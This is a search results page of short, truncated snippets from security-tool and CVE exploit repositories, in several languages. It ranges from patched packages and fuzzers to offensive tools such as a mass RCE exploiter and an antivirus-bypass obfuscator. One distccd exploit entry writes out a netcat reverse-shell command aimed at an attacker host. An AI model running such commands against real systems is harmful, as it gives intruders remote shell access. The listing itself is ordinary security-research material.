3870 matches found
vue-template-compiler-patched
vue-template-compiler-patched A security-patched version of vue-template-compiler to fix the prototype pollution vulnerability CVE-2024-6783 and the ReDoS vulnerability CVE-2024-9506. Based on [email protected]. Development and issues live in vue-patched. Related If you use the Vue full buil...
pharos
Pharos Framework de Análisis Estático de Binarios El framework de análisis estático de binarios Pharos es un proyecto del Software Engineering Institute de la Carnegie Mellon University. El framework está diseñado para facilitar el análisis automatizado de programas binarios. Utiliza la...
device-modeling-language
Device Modeling Language The Device Modeling Language DML is a domain-specific language for writing fast functional or transaction-level device models for virtual platforms. DML provides high-level abstractions suitable for functional device models, including constructs like register banks,...
CVE-2025-50360
Desbordamiento de Búfer en el Montón en Pepper Language Pepper Language es un lenguaje de programación interpretado rápido, diseñado para simplicidad y verbosidad. Tiene tipado dinámico y soporta recolección de basura. Versión afectada: Versión 0.1.1 y anteriores, Commit...
Mass-CVE-2025-29306
FoxCMS Mass Exploiter CVE-2025-29306 Una herramienta de automatización especializada para que los investigadores de seguridad realicen pruebas de ejecución remota de comandos RCE en múltiples objetivos. 🛡️ Nota de seguridad Este programa está escrito en Bash y ha sido cifrado/compilado con SHC...
cve-2018-4233
CVE-2018-4233 Exploit para CVE-2018-4233, un error en el compilador JIT de WebKit. Probado en Safari 11.0.3 en macOS 10.13.3. Para más detalles, consulte https://saelo.github.io/presentations/blackhatus18attackingclientsidejitcompilers.pdf El exploit obtiene lectura/escritura arbitraria de memori...
ShellcodeCompiler
Shellcode Compiler Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows x86 and x64 and Linux x86 and x64. It is possible to call any Windows API function or Linux syscall in a user-friendly way. Shellcode Compiler...
CVE-2018-6574
CVE-2018-6574 Golang go get 命令的远程命令执行漏洞利用。 介绍 当你使用 go get 获取一个包时,Go 的设计是构建并安装该包,而不运行其中的任何代码。其意图是,你可以安全地获取、构建甚至安装 Go 包,而完全不需要信任它们。理论上,这对 Go 工具链来说似乎是一项简单的任务,但实际上,这是一个真正的挑战。go get 在幕后做了很多工作,包括以受包配置严重影响的方式调用第三方工具,如 git 和 clang。确保这些调用的安全性是一场持久战,而 Go 尚未完全获胜。 当 cgo 启用时,“go get” 期间的构建步骤会调用宿主机的 C 编译器(gcc ...
crlfuzz
CRLFuzz A fast tool to scan CRLF vulnerability written in Go Resources Installation from Binary from Source from GitHub Usage Basic Usage Flags Target Single URL URLs from list from Stdin...
distccd_rce_CVE-2004-2687
El objetivo de este script no es usar Metasploit, sino hacerlo manualmente. Uso: root@kitploit: nc -lvnp 4466 Ejecutando el exploit: root@kitploit: python3 ./exploit.py -t targetip -p targetport -c "nc attackerip attackerport -e /bin/sh"...
OffensiveDLR
OffensiveDLR Toolbox que contiene notas de investigación y código PoC para weaponizar el DLR de .NET Contenidos Script| Descripción ---|--- Kukulkan| Una versión reducida de SILENTTRINITY, DLL y EXE en C que embeben un motor IPY. Las comunicaciones están cifradas y pueden usarse con CobaltStrike...
cargo-fuzz
cargo fuzz ¡Un subcomando decargo para hacer fuzzing con libFuzzer! ¡Fácil de usar! Instalación root@kitploit: $ cargo install cargo-fuzz Nota: libFuzzer necesita soporte de sanitizers de LLVM, por lo que esto solo funciona en x86-64 y Aarch64, y solo en sistemas operativos tipo Unix no Windows...
CVE-2021-44228
CVE-2021-44228-POC Otro POC de CVE-2021-44228 Versiones de Log4j afectadas: desde 2.0-beta9 hasta 2.14.1 Prerrequisitos Java utilizado: OpenJDK 11 https://jdk.java.net/archive/ Maven necesario para compilar las aplicaciones en este repositorio alternativamente, descargue los archivos jar preparad...
avcleaner
avcleaner C/C++ source obfuscator for antivirus bypass Blog posts The implementation is rather complex and this domain in software development is rarely documented in layman's terms. This is why there are blog posts which detail every design choice and go over the quirks of working with the LLVM...
CVE-2023-1521
PoC root@kitploit: gcc -shared -o libpoc.so poc.c -fPIC export LDPRELOAD=fullpathtolibpoc.so sccache gcc foo.c -o foo...
cobol-shield
cobol-shield Security auditing toolkit for COBOL legacy systems Part of VTR Research Methodology | DOI: 10.5281/zenodo.22063208 Status: Reproducible | License: MIT | Track: Critical Infrastructure What it does Detects compilation context divergences, invisible Unicode attacks, and unsafe COBOL...
Defender_Exclusions-BOF
Defender Exclusions BOF What A BOF to determine Windows Defender exclusions: Extensions Processes Folders Why Examples of using the C++ compiler to create BOFs without the need for the intermediary vtable dereferences. Building root@kitploit: cd src make all Usage 1. Load...
CVE-2026-88057
A flaw was found in Angular's @angular/core and @angular/compiler components. This vulnerability allows a remote attacker to bypass security sanitization mechanisms. By injecting malicious data into specific HTML attributes, an attacker can cause the application to execute arbitrary JavaScript co...
awesome-llvm-security
awesome-llvm-security root@kitploit: If you find that some links are not working, you can simply replace the username with gmh5225. Or you can send an issue for me. Show respect to all the projects below, perfect works of art 🫡 How to contribute? https://github.com/HyunCafe/contribute-practice...
WebSafeCompiler
WebSafeCompiler WSC WebSafeCompiler WSC is an advanced utility websites compiler designed for the optimization, minification, and obfuscation if you need it of web applications and websites using Node.js. It enhances your web assets by reducing file sizes or providing durable protection against...